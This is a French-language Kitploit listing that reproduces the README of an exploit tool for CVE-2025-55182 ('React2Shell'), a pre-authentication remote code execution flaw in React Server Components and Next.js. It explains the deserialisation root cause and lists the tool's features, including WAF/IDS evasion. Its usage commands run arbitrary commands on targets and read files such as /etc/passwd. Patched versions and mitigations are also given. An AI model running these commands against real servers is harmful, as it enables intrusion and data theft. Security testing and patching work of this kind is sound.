Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182 — Exploit RCE pré-authentification pour CVE-2025-55182 (React2Shell) ciblant les React Server Components. Fonctionnalités : scanning, vérification OAST, contournement WAF, exécution de commandes et lecture de fichiers. | Kitploit
Outils/GitHubGitHub/sentinelxofficial/cve-2025-55182
ReconnaissanceAnalyse des VulnérabilitésExploitationÉvasion IDS/IPSExploitation d'Applications WebContournement de WAFTests d'IntrusionDéveloppement de Charges Utiles

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHub
sentinelxofficial/cve-2025-55182

CVE-2025-55182

Exploit RCE pré-authentification pour CVE-2025-55182 (React2Shell) ciblant les React Server Components. Fonctionnalités : scanning, vérification OAST, contournement WAF, exécution de commandes et lecture de fichiers.

Voir le dépôt
14il y a 2 moisPas encore vérifié
Partager

CVE-2025-55182 — React2Shell

Exécution de code à distance (RCE) sans authentification dans les composants serveur React (RSC), Next.js et les frameworks associés.

CVE CVSS Type Author


Aperçu

CVE-2025-55182 (également connue sous le nom de React2Shell) est une vulnérabilité critique de RCE sans authentification affectant l’écosystème des composants serveur React (RSC). Un attaquant non authentifié peut compromettre complètement un serveur vulnérable avec une seule requête HTTP POST malveillante.

Analyse technique

Cause racine

Les composants serveur React utilisent un format de sérialisation personnalisé appelé React Flight pour sérialiser les références de fonctions et les appels de modules. La vulnérabilité réside dans le mécanisme de décodage des charges utiles qui traite les requêtes POST entrantes vers les points de terminaison RSC.

Lorsque le serveur reçoit une charge utile React Flight, il désérialise le contenu sans validation adéquate, en se fiant aux champs $$typeof et aux résolutions de références de modules contrôlés par l’attaquant. Cela permet à un attaquant de :

  1. Référencer des modules natifs arbitraires de Node.js (ex. child_process, fs, net)
  2. Chaîner des appels de fonctions via le marqueur de type $F (fonction)
  3. Exécuter du code arbitraire sous l’environnement d’exécution Node.js du serveur

Versions concernées

CVSS

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical

Fonctionnalités

  • Scan – Détecter les points de terminaison RSC vulnérables et identifier les versions de Next.js/React.
  • Vérification (OAST) – Envoyer des charges utiles hors bande pour confirmer la RCE via des rappels DNS/HTTP.
  • Contournement – Évasion complète WAF/IDS : mutations de type de contenu, encodage de charge utile, usurpation d’en-tête, variantes de chemin et charges utiles WAF.
  • Exécution – Lancer des commandes système arbitraires sur la cible (ex. id, whoami).
  • Lecture – Lire des fichiers arbitraires sur le serveur (ex. /etc/passwd, package.json).
  • Sortie JSON – Résultats lisibles par machine pour l’intégration.

Installation

root@kitploit:~
git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt

Utilisation

Scan de base

root@kitploit:~
python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json

Vérifier RCE avec OAST

root@kitploit:~
python3 poc.py -t https://target.com -m verify --oast your.oast.domain

Test complet de contournement

root@kitploit:~
python3 poc.py -t https://target.com -m bypass --verbose

Exécuter des commandes

root@kitploit:~
python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20

Lire des fichiers

root@kitploit:~
python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"

Utiliser un proxy (ex. Burp Suite)

root@kitploit:~
python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080

Structure des fichiers

root@kitploit:~
CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
    ├── __init__.py
    ├── payloads.py
    ├── scanner.py
    ├── bypass.py
    └── rce.py

Mesures d'atténuation

Correctif (Recommandé)

root@kitploit:~
npm install [email protected]
npm install [email protected] [email protected]

Solutions de contournement temporaires

· Désactiver les fonctions serveur ("use server") · Règles WAF pour bloquer Content-Type: text/x-component · Segmentation réseau pour les points de terminaison RSC


Références

· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182


Avertissement : Réservé aux tests de sécurité autorisés.

Auteur : SentinelX · https://t.me/SentinelXsecurity

root@kitploit:~
Télécharger l’outil
PaquetVulnérableCorrigé
react-server-dom-webpack19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-parcel19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-turbopack19.0.0 – 19.2.0≥ 19.2.1
next (13.x)13.3.0 – 13.5.x≥ 14.2.35
next (14.x)14.0.0 – 14.2.34≥ 14.2.35
next (15.x)15.0.0+ (voir correctif)versions corrigées